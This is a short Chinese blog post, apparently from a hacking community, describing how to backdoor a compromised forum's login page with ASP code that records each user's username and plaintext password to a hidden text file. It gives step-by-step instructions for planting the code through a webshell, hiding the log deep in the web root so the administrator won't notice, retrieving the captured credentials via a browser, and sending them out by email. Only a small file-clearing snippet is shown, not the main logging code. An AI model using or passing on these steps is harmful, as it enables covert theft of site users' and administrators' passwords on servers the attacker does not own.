博客介绍了用ASP记录明文密码的方法,将代码插入验证登陆文件末尾,替换路径,确保webshell有权限修改文件且FileSystemObject可用,一段时间后可在IE上查看登录用户的帐号密码,还提及了添加功能、清空文件等注意事项。
很多人在得到动网的数据库后郁闷不已
(呀的,管理员的变态密码让我们的机器跑砸了都没辙)
Now We Have Another Method!!!!!
这就是用asp记录明文密码。
用法:1.将此代码插入login.asp或admin_login.asp等等验证登陆的文件末尾即可。
2.将PATH换成web下可访问的路径,如:C:/Inetpub/wwwroot/.../Info.txt(info.txt的路径越深越好,防止admin发现)
3.你的webshell必须有权限修改文件且FileSystemObject可用。
4.一段时间后在IE上访问:http://.../Info.txt就 可以看到登录过的用户的帐号密码。
5.在IE上输http://.../(which your modified).asp?u=del可一清楚info.txt的内容。
注意:1.你可以为它添加其他功能,例如:已记录的用户不再重复记录,用邮件接收密码等等。
2.为了防止info.txt过大,我用清空info.txt的方法。
当然你可以新建文件来解决此问题。
if filesize>200000 then
set file2=fso.OpenTextFile(PATH,2,True)
file2.WriteLine ""
file2.close
end if
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
